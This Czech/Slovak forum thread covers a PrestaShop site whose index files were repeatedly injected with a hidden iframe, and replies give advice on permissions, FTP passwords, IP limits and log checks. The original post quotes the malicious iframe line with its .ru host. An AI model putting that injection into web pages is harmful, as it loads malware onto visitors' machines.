Napadení webu hackerem

[rcking]

Ahoj,
mám takový zásadní problém - několikrát mi v prestě přestal fungovat admin a teď i titulní stránka. Vždycky jsem to vyřešil přehráním zálohy a už to zase šlo ale teď mi to nedalo a porovnával jsem obsah souborů a zjistil jsem, že do index.html mi někdo na konec vloží toto

ubdwzsjxfzqxaajajtglmjaxhfdjapt<iframe width=121 height=630 src="http://hochesh-li.ru:8080/index.php" ></iframe>

Jsou tam i jiné drobné změny většinou formální. Napadá někoho čím to může být? Jak se proti tomuto zabezpečit?

Hostuji u forpsi, verze PS 1.1

[XM4N]

no zabezpecit... spis zkontrolujte prava k souborum pro slozky pouzivejte 755 a pro soubory 644 , tzv. pokud mate vsude 777 muze to byt hlavni pricina,ale taky ne taky jestli nekdo nahodou nezna vase heslo na FTP to by mohl byt ale mnohem vetsi problem,pak by ani uprava prav asi nezabranila...pripadne ma presta nejakou bezpecnostni diru pak by to chtelo resit (v pripade ze by se to stale opakovalo) primo s vyvojari!
Drzim palce!!!

[rcking]

Z Forpsi mě napsali link na stránku s obecným pokecem o napadení webu typu "trojan, heslo v TC" atd.., vir v PC nemám a heslo v TC sice ano, ale zabezpečeno šifrováním (což by mělo být dostačující). Takže jsem všechny napadené soubory obnovil ze zálohy (napadlo to všechny INDEX.PHP), změnil heslo na FTP a napsal si ho na papírek... jen doufám, že satelit Google nemá takové rozlišení aby si to moje heslo někdo přečetl z Earth..

[XM4N]

:coolsmile: velky bratr te sleduje :-D no prave ani to sifrovani v totalu moc nezabira...ja uz radsi napsal vetsinu dulezitych na papir.Nicmene dneska se da na netu chytit dost "srandicek" co zneprijemni PC zivot(casto i ten realny).
Jinak to napadeni vseho kde je index.php to opravdu delaji automaticky programky clovek by to nestihl(stovky webu za den)

[mira]

Já bych ještě doporučil nastavení omezení přístupu na FTP jen pro určité IP adresy.

[Clerc]

Já bych ještě doporučil nastavení omezení přístupu na FTP jen pro určité IP adresy.

Obmedzenie IP adresy možno tiež pomôže. Nedávno som mal tento istý problém. Na vine bol vírus (trójsky kôň) v počítači, ktorý prečítal uložené heslá a odosielal na cudzí server. Keď ho aj antivírus detekoval a odstránil objavil sa znovu a dosť ťažko som ho zbavil.

Riešením bolo tak ako píšu viacerí v tomto vlákne neukladať heslá pri jednotlivých FTP klientov ale dať ho na papier alebo si ho pamätať. Zatiaľ je pokoj.

[David.dee]

Ono v dnešní době používat TC je sebevražda. Pochopitelně myslím tím pro připojení k FTP. U několika našich zákazníků došlo k tomu samému případu, tedy odcizení hesel přímo z TC. Každopádně v tomto případě mnohdy pomůže okamžitá změna přístupových údajů k FTP, DB apod. Dalším nutným krokem je požádat o log souborů od poskytovatele webhostingu ve kterých je obsažen výraz "<iframe". Každá tato infiltrace Trojan HTML frame takto začíná. Většinou webhosteři zálohují 7 dní zpět, tedy pokud všechny zálohy budou zavirované, nezbyde Vám nic jiného než se vrhnout na mravenčí práci a odstraňovat kód ze zavirovaných souborů manuálně. Mluvím z vlastní zkušenosti. U presty jednoho zákazníka bylo zavirováno asi 270 souborů.

Důležité upozornění. Opomenete-li jeden zavirovaný soubor, můžete během několika hodin dělat vše znovu. Proto doporučuji vyžádat si log zavirovaných souborů. V případě přítomnosti antivirového programu A** je nutné jej deaktivovat, jelikož ten jako jeden z mála tyto infiltrace při otevření v editoru nepovolí otevřít.

Hodně štěstí.

David